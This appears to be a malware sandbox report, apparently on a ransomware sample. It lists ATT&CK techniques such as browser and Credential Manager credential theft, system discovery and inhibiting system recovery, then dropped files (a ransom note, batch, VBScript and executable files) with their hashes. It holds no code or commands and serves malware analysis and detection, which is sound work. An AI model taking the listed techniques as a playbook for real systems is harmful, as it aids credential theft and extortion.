                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credentials from Web Browsers

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1555.003

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Windows Credential Manager

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1555.004

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Unsecured Credentials

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1552

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credentials In Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1552.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Browser Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1217

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Location Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1614

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Language Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1614.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Defacement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1491

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1490

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\#README_EMAN#.rtf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e72ef42d5f3ada308ae5d937f2989b71

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e266429bed304d32356f1320d4f379b10b0f3bd5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bcfc09ab982b5472a97278dad5b31e5d6c76006441b1df6f18820da3f5f5380a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b9b79013d7d549024f812672ef08ff842997fa8b6d139c30889bf5d1dc7c9e3b8cf0deef11fadf61c15a20b7b239a5e14eb9d6b4ea2dffa085a6862bc8162a3b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  226B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3e28dd5f3a4b1641e643c841787b8e9c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8df2fe966f6af56be599ce5d2759375eb7f47118

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bb81c2e99c6efb4eb953bf9b79d360db33e6e7e109906c4d58f5915f602cb50a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  14e27cdadf00644443bf11820875b1d1ec160f835ce1e2be8dc372a325dac94e6536be166c5106a4da23c34df7efb9328791c9c5dc1cb8d1300a575e4288e225

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\NWWdFPJ5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a93bd199d34d21cc9102600c6ce782cf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  31b50d84aa1af4f0e76a523382caba476f6e45dc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\TCDA50F.tmp\sist02.xsl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  245KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f883b260a8d67082ea895c14bf56dd56

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7954565c1f243d46ad3b1e2f1baf3281451fc14b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bad_28CFDFB9A30FCE4A.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e37d695fcd3454b793dfd0de94c2383e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e5718b32a7afaacca3522186f6a31d4dad065232

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  51ffacc4c5d06608d9f15574b153284d6c924ac84de7eeaa63e747527efea608

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a6019cbf9c46255f4f06e3b24b333cb5af1dae6eba3d27ccdaa58ae8bf8eda69c8c8f77a79ad293df71ea4026dee05782fa8028541fe8c2e64e770acdf8467c2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\elog_28CFDFB9A30FCE4A.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  29KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0ce2e8502b3e525a5dfcdf06833d4d31

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9ffba734c5b842eb34eb03735ee809c49cd02c21

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fe594c0fa8d290604b825ae62e77776842a4da98d2385d50ce8ea15854a3bbfb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f2583f4d0ec4e26b93bea0de8de2aa2b8bfc0c06dcc194907290dca477d2eb9078e9a94ab98f1bca0924a3ffe103b772a8535be24529a1e6419ddd98d63c8538

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  181KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2f5b509929165fc13ceab9393c3b911d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b016316132a6a277c5d8a4d7f3d6e2c769984052

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  221KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3026bc2448763d5a9862d864b97288ff

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  315B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  92b3000ae625b1d1315f270ff2f27b09

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  44f143e8ec4c46fb111cbc60518c520b28db04bf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b8c66ddd2d64c0136cac5c908723373f30b9ecfe37caea69ea0ee6114f99cac9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f14b5583fb61492564761a4d5c78fd946f9d5964b05d31b5d7fb9b528632bfe7f01dd614709de7baa36526cb920b79601d4bb64010f01975f00e0d8b1a6d6240

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  18KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a526aff4c27eb6455e51aecee860c59a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ddf4d9d611c39f6a9c748bf3cff4582336c759f6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  66bcd167217baeac207103331c741cfedb1b8129588d92a303f9635dbbdfaff7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bd7363e78c173493823e04a46c9bb3a50f74692fc8ffbca4762470f23ff9d888bbcf7e6895e8bda2652c759c2c5dd8ac21b6c041cc89029e6de3844f2ef55d0e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\dHHgJtEL.bat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  265B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7594e29988d5e98f45a535dbb56a6ab5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f634f1ba743113b6d92f1fcc64209385375d1592

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  be9c11956206fea75cb0fe7b9afd48c68ab4386d24fccb896307f8ded8cc3391

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f68cd3e3832f821e9f56e533fbdb5f9d37e9712443ad4f7e3899c58410c31c834b04ef59cc72191a3d4f40ad9db91c9dd0a7fd5e67275d68b0b59c83c213ae0d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\qXsbtbFk.vbs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  260B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  230d3262f6250a421f6ba4eb7c93f965

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24d0bf5a773d93425dce349b9c0c793e4e7a1eea

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  784f736b86164780f655eaa198779fcc6b0a04e3d12b8ed802cc007c8447073c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1641ec507d742520e23de5462d5d57325785236561c4b52744cba54928d9a2dd8683e69da36cd226e40b78cb0086fc6c599b79359b7ca9e4799e51c4f2178eaa

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\desktop.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  faa059a71820788c586e11732e39a972

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7c20f8604b1921f6a551f4ee7d2505492fca9519

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f6e94d364bd702c94db4289262ea7dccb793a98784e008edb523e7d5cef594eb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e5660cd83c64499ba7f2fb664c8414a128166d2623a570a0ab464c56ea261cebf92057130fa2540914830832b0808fb8fb29283daf17239c01a986b9504a726c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Submit

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\desktop.ini
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6646491b757bfeb82b72d8670babac26

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  99ba7d72d51ae410a1feab657951d4758cd6421e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1dc054a070b8f916b4bf047dcfff2aa7acb25e9b574661e98451cecd6858c619

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

